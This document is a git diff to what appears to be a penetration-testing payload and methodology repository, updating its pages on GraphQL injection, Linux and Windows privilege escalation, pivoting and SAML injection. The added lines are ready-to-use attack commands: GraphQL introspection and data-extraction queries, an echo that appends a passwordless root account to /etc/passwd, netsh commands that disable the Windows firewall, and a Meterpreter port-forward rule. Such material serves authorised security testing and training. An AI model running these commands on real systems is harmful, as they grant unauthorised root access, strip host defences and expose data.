diff --git a/GraphQL Injection/Images/htb-help.png b/GraphQL Injection/Images/htb-help.png new file mode 100644 index 0000000..5b0493b Binary files /dev/null and b/GraphQL Injection/Images/htb-help.png differ diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index f7b0a75..cfc73ff 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md @@ -4,10 +4,10 @@ ## Exploit -Identify an injection point +### Identify an injection point -```javascript -?param={__schema{types{name}}} +```js +example.com/graphql?query={__schema{types{name}}} ``` Check if errors are visible @@ -17,7 +17,15 @@ Check if errors are visible ?param={thisdefinitelydoesnotexist} ``` -Enumerate Database Schema with the following GraphQL query +### Extract data + +```js +example.com/graphql?query={TYPE_1{FIELD_1,FIELD_2}} +``` + +![HTB Help - GraphQL injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/Images/htb-help.png?raw=true) + +### Enumerate Database Schema with the following GraphQL query ```javascript fragment FullType on __Type { @@ -114,10 +122,9 @@ query IntrospectionQuery { } } } - ``` -Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type +### Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type ```javascript {__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}} @@ -127,4 +134,4 @@ Enumerate the definition of interesting types using the following GraphQL query, * [Introduction to GraphQL](https://graphql.org/learn/) * [GraphQL Introspection](https://graphql.org/learn/introspection/) - +* [API Hacking GraphQL - @ghostlulz - jun 8, 2019](https://medium.com/@ghostlulzhacks/api-hacking-graphql-7b2866ba1cf2) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index bcf6af3..dfae6bd 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -384,6 +384,14 @@ E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` You can now use the `su` command with `hacker:hacker` +Alternatively you can use the following lines to add a dummy user without a password. +WARNING: you might degrade the current security of the machine. + +```powershell +echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd +su - dummy +``` + ## NFS Root Squashing @@ -526,6 +534,8 @@ lxc start mycontainer lxc exec mycontainer /bin/sh ``` +Alternatively https://github.com/initstring/lxd_root + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 227d80a..a9d182f 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -85,6 +85,7 @@ optional arguments: ```c portfwd list +portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 or diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 3975ad9..45e88b8 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -172,6 +172,13 @@ List firewall's blocked ports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports ``` +Disable firewall + +```powershell +netsh firewall set opmode disable +netsh advfirewall set allprofiles state off +``` + List all network shares ```powershell diff --git a/SAML Injection/README.md b/SAML Injection/README.md index 928b56e..e244bfd 100644 --- a/SAML Injection/README.md +++ b/SAML Injection/README.md @@ -161,7 +161,7 @@ The SAML response is accepted by the service provider. Due to the vulnerability, An XSLT can be carried out by using the `transform` element. -![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) +![http://sso-attacks.org/images/4/49/XSLT1.jpg](http://sso-attacks.org/images/4/49/XSLT1.jpg) Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_Attack) ```xml